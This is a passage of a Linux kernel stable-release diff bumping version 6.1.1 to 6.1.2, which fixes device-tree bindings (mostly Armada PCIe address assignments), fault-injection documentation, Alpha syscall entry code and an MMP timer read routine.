+@@ -30,7 +30,9 @@ properties:
+     maxItems: 1
+ 
+   "#pwm-cells":
+-    const: 2
++    enum: [2, 3]
++    description:
++      The only flag supported by the controller is PWM_POLARITY_INVERTED.
+ 
+   microchip,sync-update-mask:
+     description: |
+diff --git a/Documentation/devicetree/bindings/sound/qcom,wcd9335.txt b/Documentation/devicetree/bindings/sound/qcom,wcd9335.txt
+index 5d6ea66a863fe..1f75feec3dec6 100644
+--- a/Documentation/devicetree/bindings/sound/qcom,wcd9335.txt
++++ b/Documentation/devicetree/bindings/sound/qcom,wcd9335.txt
+@@ -109,7 +109,7 @@ audio-codec@1{
+ 	reg  = <1 0>;
+ 	interrupts = <&msmgpio 54 IRQ_TYPE_LEVEL_HIGH>;
+ 	interrupt-names = "intr2"
+-	reset-gpios = <&msmgpio 64 0>;
++	reset-gpios = <&msmgpio 64 GPIO_ACTIVE_LOW>;
+ 	slim-ifc-dev  = <&wc9335_ifd>;
+ 	clock-names = "mclk", "native";
+ 	clocks = <&rpmcc RPM_SMD_DIV_CLK1>,
+diff --git a/Documentation/devicetree/bindings/sound/rt5682.txt b/Documentation/devicetree/bindings/sound/rt5682.txt
+index c5f2b8febceec..6b87db68337c2 100644
+--- a/Documentation/devicetree/bindings/sound/rt5682.txt
++++ b/Documentation/devicetree/bindings/sound/rt5682.txt
+@@ -46,7 +46,7 @@ Optional properties:
+ 
+ - realtek,dmic-clk-driving-high : Set the high driving of the DMIC clock out.
+ 
+-- #sound-dai-cells: Should be set to '<0>'.
++- #sound-dai-cells: Should be set to '<1>'.
+ 
+ Pins on the device (for linking into audio routes) for RT5682:
+ 
+diff --git a/Documentation/driver-api/spi.rst b/Documentation/driver-api/spi.rst
+index f64cb666498aa..f28887045049d 100644
+--- a/Documentation/driver-api/spi.rst
++++ b/Documentation/driver-api/spi.rst
+@@ -25,8 +25,8 @@ hardware, which may be as simple as a set of GPIO pins or as complex as
+ a pair of FIFOs connected to dual DMA engines on the other side of the
+ SPI shift register (maximizing throughput). Such drivers bridge between
+ whatever bus they sit on (often the platform bus) and SPI, and expose
+-the SPI side of their device as a :c:type:`struct spi_master
+-<spi_master>`. SPI devices are children of that master,
++the SPI side of their device as a :c:type:`struct spi_controller
++<spi_controller>`. SPI devices are children of that master,
+ represented as a :c:type:`struct spi_device <spi_device>` and
+ manufactured from :c:type:`struct spi_board_info
+ <spi_board_info>` descriptors which are usually provided by
+diff --git a/Documentation/fault-injection/fault-injection.rst b/Documentation/fault-injection/fault-injection.rst
+index 17779a2772e51..5f6454b9dbd4d 100644
+--- a/Documentation/fault-injection/fault-injection.rst
++++ b/Documentation/fault-injection/fault-injection.rst
+@@ -83,9 +83,7 @@ configuration of fault-injection capabilities.
+ - /sys/kernel/debug/fail*/times:
+ 
+ 	specifies how many times failures may happen at most. A value of -1
+-	means "no limit". Note, though, that this file only accepts unsigned
+-	values. So, if you want to specify -1, you better use 'printf' instead
+-	of 'echo', e.g.: $ printf %#x -1 > times
++	means "no limit".
+ 
+ - /sys/kernel/debug/fail*/space:
+ 
+@@ -284,7 +282,7 @@ Application Examples
+     echo Y > /sys/kernel/debug/$FAILTYPE/task-filter
+     echo 10 > /sys/kernel/debug/$FAILTYPE/probability
+     echo 100 > /sys/kernel/debug/$FAILTYPE/interval
+-    printf %#x -1 > /sys/kernel/debug/$FAILTYPE/times
++    echo -1 > /sys/kernel/debug/$FAILTYPE/times
+     echo 0 > /sys/kernel/debug/$FAILTYPE/space
+     echo 2 > /sys/kernel/debug/$FAILTYPE/verbose
+     echo Y > /sys/kernel/debug/$FAILTYPE/ignore-gfp-wait
+@@ -338,7 +336,7 @@ Application Examples
+     echo N > /sys/kernel/debug/$FAILTYPE/task-filter
+     echo 10 > /sys/kernel/debug/$FAILTYPE/probability
+     echo 100 > /sys/kernel/debug/$FAILTYPE/interval
+-    printf %#x -1 > /sys/kernel/debug/$FAILTYPE/times
++    echo -1 > /sys/kernel/debug/$FAILTYPE/times
+     echo 0 > /sys/kernel/debug/$FAILTYPE/space
+     echo 2 > /sys/kernel/debug/$FAILTYPE/verbose
+     echo Y > /sys/kernel/debug/$FAILTYPE/ignore-gfp-wait
+@@ -369,7 +367,7 @@ Application Examples
+     echo N > /sys/kernel/debug/$FAILTYPE/task-filter
+     echo 100 > /sys/kernel/debug/$FAILTYPE/probability
+     echo 0 > /sys/kernel/debug/$FAILTYPE/interval
+-    printf %#x -1 > /sys/kernel/debug/$FAILTYPE/times
++    echo -1 > /sys/kernel/debug/$FAILTYPE/times
+     echo 0 > /sys/kernel/debug/$FAILTYPE/space
+     echo 1 > /sys/kernel/debug/$FAILTYPE/verbose
+ 
+diff --git a/Makefile b/Makefile
+index 7307ae6c2ef72..2ecc568c779fa 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 1
++SUBLEVEL = 2
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/Kconfig b/arch/Kconfig
+index 8f138e580d1ae..81599f5c17b0f 100644
+--- a/arch/Kconfig
++++ b/arch/Kconfig
+@@ -635,7 +635,7 @@ config ARCH_SUPPORTS_SHADOW_CALL_STACK
+ config SHADOW_CALL_STACK
+ 	bool "Shadow Call Stack"
+ 	depends on ARCH_SUPPORTS_SHADOW_CALL_STACK
+-	depends on DYNAMIC_FTRACE_WITH_REGS || !FUNCTION_GRAPH_TRACER
++	depends on DYNAMIC_FTRACE_WITH_ARGS || DYNAMIC_FTRACE_WITH_REGS || !FUNCTION_GRAPH_TRACER
+ 	help
+ 	  This option enables the compiler's Shadow Call Stack, which
+ 	  uses a shadow stack to protect function return addresses from
+diff --git a/arch/alpha/include/asm/thread_info.h b/arch/alpha/include/asm/thread_info.h
+index fdc485d7787a6..084c27cb0c707 100644
+--- a/arch/alpha/include/asm/thread_info.h
++++ b/arch/alpha/include/asm/thread_info.h
+@@ -75,7 +75,7 @@ register struct thread_info *__current_thread_info __asm__("$8");
+ 
+ /* Work to do on interrupt/exception return.  */
+ #define _TIF_WORK_MASK		(_TIF_SIGPENDING | _TIF_NEED_RESCHED | \
+-				 _TIF_NOTIFY_RESUME)
++				 _TIF_NOTIFY_RESUME | _TIF_NOTIFY_SIGNAL)
+ 
+ /* Work to do on any return to userspace.  */
+ #define _TIF_ALLWORK_MASK	(_TIF_WORK_MASK		\
+diff --git a/arch/alpha/kernel/entry.S b/arch/alpha/kernel/entry.S
+index e227f3a29a43c..c41a5a9c3b9f2 100644
+--- a/arch/alpha/kernel/entry.S
++++ b/arch/alpha/kernel/entry.S
+@@ -469,8 +469,10 @@ entSys:
+ #ifdef CONFIG_AUDITSYSCALL
+ 	lda     $6, _TIF_SYSCALL_TRACE | _TIF_SYSCALL_AUDIT
+ 	and     $3, $6, $3
+-#endif
+ 	bne     $3, strace
++#else
++	blbs    $3, strace		/* check for SYSCALL_TRACE in disguise */
++#endif
+ 	beq	$4, 1f
+ 	ldq	$27, 0($5)
+ 1:	jsr	$26, ($27), sys_ni_syscall
+diff --git a/arch/arm/boot/dts/armada-370.dtsi b/arch/arm/boot/dts/armada-370.dtsi
+index 9dc928859ad33..2013a5ccecd31 100644
+--- a/arch/arm/boot/dts/armada-370.dtsi
++++ b/arch/arm/boot/dts/armada-370.dtsi
+@@ -84,7 +84,7 @@
+ 
+ 			pcie2: pcie@2,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82002800 0 0x80000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x80000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+diff --git a/arch/arm/boot/dts/armada-375.dtsi b/arch/arm/boot/dts/armada-375.dtsi
+index 929deaf312a55..c310ef26d1cce 100644
+--- a/arch/arm/boot/dts/armada-375.dtsi
++++ b/arch/arm/boot/dts/armada-375.dtsi
+@@ -592,7 +592,7 @@
+ 
+ 			pcie1: pcie@2,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x44000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x44000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+diff --git a/arch/arm/boot/dts/armada-380.dtsi b/arch/arm/boot/dts/armada-380.dtsi
+index ce1dddb2269b0..e94f22b0e9b5e 100644
+--- a/arch/arm/boot/dts/armada-380.dtsi
++++ b/arch/arm/boot/dts/armada-380.dtsi
+@@ -89,7 +89,7 @@
+ 			/* x1 port */
+ 			pcie@2,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x40000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x40000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -118,7 +118,7 @@
+ 			/* x1 port */
+ 			pcie@3,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x44000 0 0x2000>;
++				assigned-addresses = <0x82001800 0 0x44000 0 0x2000>;
+ 				reg = <0x1800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+diff --git a/arch/arm/boot/dts/armada-385-turris-omnia.dts b/arch/arm/boot/dts/armada-385-turris-omnia.dts
+index 72ac807cae259..0c1f238e4c306 100644
+--- a/arch/arm/boot/dts/armada-385-turris-omnia.dts
++++ b/arch/arm/boot/dts/armada-385-turris-omnia.dts
+@@ -23,6 +23,12 @@
+ 		stdout-path = &uart0;
+ 	};
+ 
++	aliases {
++		ethernet0 = &eth0;
++		ethernet1 = &eth1;
++		ethernet2 = &eth2;
++	};
++
+ 	memory {
+ 		device_type = "memory";
+ 		reg = <0x00000000 0x40000000>; /* 1024 MB */
+@@ -483,7 +489,17 @@
+ 				};
+ 			};
+ 
+-			/* port 6 is connected to eth0 */
++			ports@6 {
++				reg = <6>;
++				label = "cpu";
++				ethernet = <&eth0>;
++				phy-mode = "rgmii-id";
++
++				fixed-link {
++					speed = <1000>;
++					full-duplex;
++				};
++			};
+ 		};
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/armada-385.dtsi b/arch/arm/boot/dts/armada-385.dtsi
+index 83392b92dae28..be8d607c59b21 100644
+--- a/arch/arm/boot/dts/armada-385.dtsi
++++ b/arch/arm/boot/dts/armada-385.dtsi
+@@ -93,7 +93,7 @@
+ 			/* x1 port */
+ 			pcie2: pcie@2,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x40000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x40000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -121,7 +121,7 @@
+ 			/* x1 port */
+ 			pcie3: pcie@3,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x44000 0 0x2000>;
++				assigned-addresses = <0x82001800 0 0x44000 0 0x2000>;
+ 				reg = <0x1800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -152,7 +152,7 @@
+ 			 */
+ 			pcie4: pcie@4,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x48000 0 0x2000>;
++				assigned-addresses = <0x82002000 0 0x48000 0 0x2000>;
+ 				reg = <0x2000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+diff --git a/arch/arm/boot/dts/armada-39x.dtsi b/arch/arm/boot/dts/armada-39x.dtsi
+index 923b035a3ab38..9d1cac49c022f 100644
+--- a/arch/arm/boot/dts/armada-39x.dtsi
++++ b/arch/arm/boot/dts/armada-39x.dtsi
+@@ -463,7 +463,7 @@
+ 			/* x1 port */
+ 			pcie@2,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x40000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x40000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -492,7 +492,7 @@
+ 			/* x1 port */
+ 			pcie@3,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x44000 0 0x2000>;
++				assigned-addresses = <0x82001800 0 0x44000 0 0x2000>;
+ 				reg = <0x1800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -524,7 +524,7 @@
+ 			 */
+ 			pcie@4,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x48000 0 0x2000>;
++				assigned-addresses = <0x82002000 0 0x48000 0 0x2000>;
+ 				reg = <0x2000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+diff --git a/arch/arm/boot/dts/armada-xp-mv78230.dtsi b/arch/arm/boot/dts/armada-xp-mv78230.dtsi
+index bf9360f41e0a6..5ea9d509cd308 100644
+--- a/arch/arm/boot/dts/armada-xp-mv78230.dtsi
++++ b/arch/arm/boot/dts/armada-xp-mv78230.dtsi
+@@ -107,7 +107,7 @@
+ 
+ 			pcie2: pcie@2,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x44000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x44000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -135,7 +135,7 @@
+ 
+ 			pcie3: pcie@3,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x48000 0 0x2000>;
++				assigned-addresses = <0x82001800 0 0x48000 0 0x2000>;
+ 				reg = <0x1800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -163,7 +163,7 @@
+ 
+ 			pcie4: pcie@4,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x4c000 0 0x2000>;
++				assigned-addresses = <0x82002000 0 0x4c000 0 0x2000>;
+ 				reg = <0x2000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -191,7 +191,7 @@
+ 
+ 			pcie5: pcie@5,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x80000 0 0x2000>;
++				assigned-addresses = <0x82002800 0 0x80000 0 0x2000>;
+ 				reg = <0x2800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+diff --git a/arch/arm/boot/dts/armada-xp-mv78260.dtsi b/arch/arm/boot/dts/armada-xp-mv78260.dtsi
+index 0714af52e6075..6c6fbb9faf5ac 100644
+--- a/arch/arm/boot/dts/armada-xp-mv78260.dtsi
++++ b/arch/arm/boot/dts/armada-xp-mv78260.dtsi
+@@ -122,7 +122,7 @@
+ 
+ 			pcie2: pcie@2,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x44000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x44000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -150,7 +150,7 @@
+ 
+ 			pcie3: pcie@3,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x48000 0 0x2000>;
++				assigned-addresses = <0x82001800 0 0x48000 0 0x2000>;
+ 				reg = <0x1800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -178,7 +178,7 @@
+ 
+ 			pcie4: pcie@4,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x4c000 0 0x2000>;
++				assigned-addresses = <0x82002000 0 0x4c000 0 0x2000>;
+ 				reg = <0x2000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -206,7 +206,7 @@
+ 
+ 			pcie5: pcie@5,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x80000 0 0x2000>;
++				assigned-addresses = <0x82002800 0 0x80000 0 0x2000>;
+ 				reg = <0x2800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -234,7 +234,7 @@
+ 
+ 			pcie6: pcie@6,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x84000 0 0x2000>;
++				assigned-addresses = <0x82003000 0 0x84000 0 0x2000>;
+ 				reg = <0x3000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -262,7 +262,7 @@
+ 
+ 			pcie7: pcie@7,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x88000 0 0x2000>;
++				assigned-addresses = <0x82003800 0 0x88000 0 0x2000>;
+ 				reg = <0x3800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -290,7 +290,7 @@
+ 
+ 			pcie8: pcie@8,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x8c000 0 0x2000>;
++				assigned-addresses = <0x82004000 0 0x8c000 0 0x2000>;
+ 				reg = <0x4000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -318,7 +318,7 @@
+ 
+ 			pcie9: pcie@9,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x42000 0 0x2000>;
++				assigned-addresses = <0x82004800 0 0x42000 0 0x2000>;
+ 				reg = <0x4800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+diff --git a/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts b/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
+index a6a2bc3b855c2..fcc890e3ad735 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
+@@ -162,16 +162,9 @@
+ 		#size-cells = <1>;
+ 		ranges;
+ 
+-		/* LPC FW cycle bridge region requires natural alignment */
+-		flash_memory: region@b8000000 {
+-			no-map;
+-			reg = <0xb8000000 0x04000000>; /* 64M */
+-		};
+-
+-		/* 48MB region from the end of flash to start of vga memory */
+-		ramoops@bc000000 {
++		ramoops@b3e00000 {
+ 			compatible = "ramoops";
+-			reg = <0xbc000000 0x200000>; /* 16 * (4 * 0x8000) */
++			reg = <0xb3e00000 0x200000>; /* 16 * (4 * 0x8000) */
+ 			record-size = <0x8000>;
+ 			console-size = <0x8000>;
+ 			ftrace-size = <0x8000>;
+@@ -179,6 +172,12 @@
+ 			max-reason = <3>; /* KMSG_DUMP_EMERG */
+ 		};
+ 
++		/* LPC FW cycle bridge region requires natural alignment */
++		flash_memory: region@b4000000 {
++			no-map;
++			reg = <0xb4000000 0x04000000>; /* 64M */
++		};
++
+ 		/* VGA region is dictated by hardware strapping */
+ 		vga_memory: region@bf000000 {
+ 			no-map;
+diff --git a/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts b/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
+index bf59a9962379d..4879da4cdbd25 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
+@@ -95,14 +95,9 @@
+ 		#size-cells = <1>;
+ 		ranges;
+ 
+-		flash_memory: region@b8000000 {
+-			no-map;
+-			reg = <0xb8000000 0x04000000>; /* 64M */
+-		};
+-
+-		ramoops@bc000000 {
++		ramoops@b3e00000 {
+ 			compatible = "ramoops";
+-			reg = <0xbc000000 0x200000>; /* 16 * (4 * 0x8000) */
++			reg = <0xb3e00000 0x200000>; /* 16 * (4 * 0x8000) */
+ 			record-size = <0x8000>;
+ 			console-size = <0x8000>;
+ 			ftrace-size = <0x8000>;
+@@ -110,6 +105,13 @@
+ 			max-reason = <3>; /* KMSG_DUMP_EMERG */
+ 		};
+ 
++		/* LPC FW cycle bridge region requires natural alignment */
++		flash_memory: region@b4000000 {
++			no-map;
++			reg = <0xb4000000 0x04000000>; /* 64M */
++		};
++
++		/* VGA region is dictated by hardware strapping */
+ 		vga_memory: region@bf000000 {
+ 			no-map;
+ 			compatible = "shared-dma-pool";
+diff --git a/arch/arm/boot/dts/dove.dtsi b/arch/arm/boot/dts/dove.dtsi
+index 00a36fba2fd23..9aee3cfd3e981 100644
+--- a/arch/arm/boot/dts/dove.dtsi
++++ b/arch/arm/boot/dts/dove.dtsi
+@@ -139,7 +139,7 @@
+ 			pcie1: pcie@2 {
+ 				device_type = "pci";
+ 				status = "disabled";
+-				assigned-addresses = <0x82002800 0 0x80000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x80000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				clocks = <&gate_clk 5>;
+ 				marvell,pcie-port = <1>;
+diff --git a/arch/arm/boot/dts/nuvoton-npcm730-gbs.dts b/arch/arm/boot/dts/nuvoton-npcm730-gbs.dts
+index d10669fcd527d..9e9eba8bad5e4 100644
+--- a/arch/arm/boot/dts/nuvoton-npcm730-gbs.dts
++++ b/arch/arm/boot/dts/nuvoton-npcm730-gbs.dts
+@@ -366,7 +366,7 @@
+ 		spi-max-frequency = <20000000>;
+ 		spi-rx-bus-width = <2>;
+ 		label = "bmc";
+-		partitions@80000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+diff --git a/arch/arm/boot/dts/nuvoton-npcm730-gsj.dts b/arch/arm/boot/dts/nuvoton-npcm730-gsj.dts
+index 491606c4f044d..2a394cc15284c 100644
+--- a/arch/arm/boot/dts/nuvoton-npcm730-gsj.dts
++++ b/arch/arm/boot/dts/nuvoton-npcm730-gsj.dts
+@@ -142,7 +142,7 @@
+ 		reg = <0>;
+ 		spi-rx-bus-width = <2>;
+ 
+-		partitions@80000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+diff --git a/arch/arm/boot/dts/nuvoton-npcm730-kudo.dts b/arch/arm/boot/dts/nuvoton-npcm730-kudo.dts
+index a0c2d76526258..f7b38bee039bc 100644
+--- a/arch/arm/boot/dts/nuvoton-npcm730-kudo.dts
++++ b/arch/arm/boot/dts/nuvoton-npcm730-kudo.dts
+@@ -388,7 +388,7 @@
+ 		spi-max-frequency = <5000000>;
+ 		spi-rx-bus-width = <2>;
+ 		label = "bmc";
+-		partitions@80000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+@@ -422,7 +422,7 @@
+ 		reg = <1>;
+ 		spi-max-frequency = <5000000>;
+ 		spi-rx-bus-width = <2>;
+-		partitions@88000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+@@ -447,7 +447,7 @@
+ 		reg = <0>;
+ 		spi-max-frequency = <5000000>;
+ 		spi-rx-bus-width = <2>;
+-		partitions@A0000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+diff --git a/arch/arm/boot/dts/nuvoton-npcm750-evb.dts b/arch/arm/boot/dts/nuvoton-npcm750-evb.dts
+index 3dad32834e5ea..f53d45fa1de87 100644
+--- a/arch/arm/boot/dts/nuvoton-npcm750-evb.dts
++++ b/arch/arm/boot/dts/nuvoton-npcm750-evb.dts
+@@ -74,7 +74,7 @@
+ 		spi-rx-bus-width = <2>;
+ 		reg = <0>;
+ 		spi-max-frequency = <5000000>;
+-		partitions@80000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+@@ -135,7 +135,7 @@
+ 		spi-rx-bus-width = <2>;
+ 		reg = <0>;
+ 		spi-max-frequency = <5000000>;
+-		partitions@A0000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+diff --git a/arch/arm/boot/dts/nuvoton-npcm750-runbmc-olympus.dts b/arch/arm/boot/dts/nuvoton-npcm750-runbmc-olympus.dts
+index 132e702281fc5..87359ab05db3e 100644
+--- a/arch/arm/boot/dts/nuvoton-npcm750-runbmc-olympus.dts
++++ b/arch/arm/boot/dts/nuvoton-npcm750-runbmc-olympus.dts
+@@ -107,7 +107,7 @@
+ 		reg = <0>;
+ 		spi-rx-bus-width = <2>;
+ 
+-		partitions@80000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+@@ -146,7 +146,7 @@
+ 		reg = <1>;
+ 		npcm,fiu-rx-bus-width = <2>;
+ 
+-		partitions@88000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+@@ -173,7 +173,7 @@
+ 		reg = <0>;
+ 		spi-rx-bus-width = <2>;
+ 
+-		partitions@A0000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+diff --git a/arch/arm/boot/dts/qcom-apq8064.dtsi b/arch/arm/boot/dts/qcom-apq8064.dtsi
+index 942aa2278355d..a39b940d58532 100644
+--- a/arch/arm/boot/dts/qcom-apq8064.dtsi
++++ b/arch/arm/boot/dts/qcom-apq8064.dtsi
+@@ -1615,7 +1615,7 @@
+ 		};
+ 
+ 		etb@1a01000 {
+-			compatible = "coresight-etb10", "arm,primecell";
++			compatible = "arm,coresight-etb10", "arm,primecell";
+ 			reg = <0x1a01000 0x1000>;
+ 
+ 			clocks = <&rpmcc RPM_QDSS_CLK>;
+diff --git a/arch/arm/boot/dts/spear600.dtsi b/arch/arm/boot/dts/spear600.dtsi
+index fd41243a0b2c0..9d5a04a46b14e 100644
+--- a/arch/arm/boot/dts/spear600.dtsi
++++ b/arch/arm/boot/dts/spear600.dtsi
+@@ -47,7 +47,7 @@
+ 			compatible = "arm,pl110", "arm,primecell";
+ 			reg = <0xfc200000 0x1000>;
+ 			interrupt-parent = <&vic1>;
+-			interrupts = <12>;
++			interrupts = <13>;
+ 			status = "disabled";
+ 		};
+ 
+diff --git a/arch/arm/boot/dts/stm32mp157a-dhcor-avenger96.dts b/arch/arm/boot/dts/stm32mp157a-dhcor-avenger96.dts
+index 2e3c9fbb4eb36..275167f26fd9d 100644
+--- a/arch/arm/boot/dts/stm32mp157a-dhcor-avenger96.dts
++++ b/arch/arm/boot/dts/stm32mp157a-dhcor-avenger96.dts
+@@ -13,7 +13,6 @@
+ /dts-v1/;
+ 
+ #include "stm32mp157.dtsi"
+-#include "stm32mp15xc.dtsi"
+ #include "stm32mp15xx-dhcor-som.dtsi"
+ #include "stm32mp15xx-dhcor-avenger96.dtsi"
+ 
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
+index 90933077d66de..b6957cbdeff5f 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
+@@ -100,7 +100,7 @@
+ 		regulator-min-microvolt = <3300000>;
+ 		regulator-max-microvolt = <3300000>;
+ 
+-		gpios = <&gpioz 3 GPIO_ACTIVE_HIGH>;
++		gpio = <&gpioz 3 GPIO_ACTIVE_HIGH>;
+ 		enable-active-high;
+ 	};
+ };
+diff --git a/arch/arm/mach-mmp/time.c b/arch/arm/mach-mmp/time.c
+index 41b2e8abc9e69..708816caf859c 100644
+--- a/arch/arm/mach-mmp/time.c
++++ b/arch/arm/mach-mmp/time.c
+@@ -43,18 +43,21 @@
+ static void __iomem *mmp_timer_base = TIMERS_VIRT_BASE;
+ 
+ /*
+- * FIXME: the timer needs some delay to stablize the counter capture
++ * Read the timer through the CVWR register. Delay is required after requesting
++ * a read. The CR register cannot be directly read due to metastability issues
++ * documented in the PXA168 software manual.
+  */
+ static inline uint32_t timer_read(void)
+ {
+-	int delay = 100;
++	uint32_t val;
++	int delay = 3;
+ 
+ 	__raw_writel(1, mmp_timer_base + TMR_CVWR(1));
+ 
+ 	while (delay--)
+-		cpu_relax();
++		val = __raw_readl(mmp_timer_base + TMR_CVWR(1));
+ 
+-	return __raw_readl(mmp_timer_base + TMR_CVWR(1));
++	return val;
+ }
+ 
+ static u64 notrace mmp_read_sched_clock(void)
+diff --git a/arch/arm64/boot/dts/apple/t8103.dtsi b/arch/arm64/boot/dts/apple/t8103.dtsi
+index 51a63b29d4045..a4d195e9eb8c8 100644
+--- a/arch/arm64/boot/dts/apple/t8103.dtsi
++++ b/arch/arm64/boot/dts/apple/t8103.dtsi
+@@ -412,7 +412,7 @@
+ 			resets = <&ps_ans2>;
+ 		};
+ 
+-		pcie0_dart_0: dart@681008000 {
++		pcie0_dart_0: iommu@681008000 {
+ 			compatible = "apple,t8103-dart";
+ 			reg = <0x6 0x81008000 0x0 0x4000>;
+ 			#iommu-cells = <1>;
+@@ -421,7 +421,7 @@
+ 			power-domains = <&ps_apcie_gp>;
+ 		};
+ 
+-		pcie0_dart_1: dart@682008000 {
++		pcie0_dart_1: iommu@682008000 {
+ 			compatible = "apple,t8103-dart";
+ 			reg = <0x6 0x82008000 0x0 0x4000>;
+ 			#iommu-cells = <1>;
+@@ -430,7 +430,7 @@
+ 			power-domains = <&ps_apcie_gp>;
+ 		};
+ 
+-		pcie0_dart_2: dart@683008000 {
++		pcie0_dart_2: iommu@683008000 {
+ 			compatible = "apple,t8103-dart";
+ 			reg = <0x6 0x83008000 0x0 0x4000>;
